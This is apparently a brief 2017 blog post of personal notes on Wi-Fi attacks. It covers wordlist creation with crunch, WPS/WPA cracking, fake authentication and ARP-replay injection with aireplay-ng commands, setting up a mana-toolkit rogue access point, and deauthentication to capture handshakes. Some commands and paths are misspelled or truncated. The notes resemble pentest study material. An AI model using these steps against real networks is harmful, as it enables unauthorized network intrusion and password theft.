Wednesday, February 15, 2017

Creating WordList for Password Cracking

1. Using tool crunch

2. Cracking the password


WPA Cracking

1. Crack WPS Pin and then crack WPA PSK


Fake Authentication the Wificard with Access Point

1. Fake authentication
airplay-ng --fakeauth 0 -a MAC-AP -h MAC-my-wificard mon0

2. Packet injection
- wait for an ARP packet, then capture this packet and inject it into the traffic, this will force AP to generate a new ARP packet with a new IV, we capture this packet and inject into the traffic again, this process is repeated until the number of IV's captured is sufficient enough to crack the key.

> aireplay-ng --arpreplay -b [target MAC] -h [your MAC] [interface]


Creating a Fake Access Point (Honeypot)

1.  apt-get install mana-toolkit

2. use a wireless card (through USB) to broadcast the signals

3. leafpad /etc/mana-toolkit/hostpad-mana.conf

- set the configurations of the fake access point

4. leafpad /usr/share/mana-toolkit/run-mana/

- upstream=eth0

5. bash  /usr/share/mana-toolkit/run-mana/

6. crack WAP encryption approaches, by collecting enough packets to find packets with same IV


Deauthentication attack on any device


Disassociate the device from the network

- once the target is deauthenticated, the client will try to connect with the AP again, so that the attackers can capture these connection packets for password cracking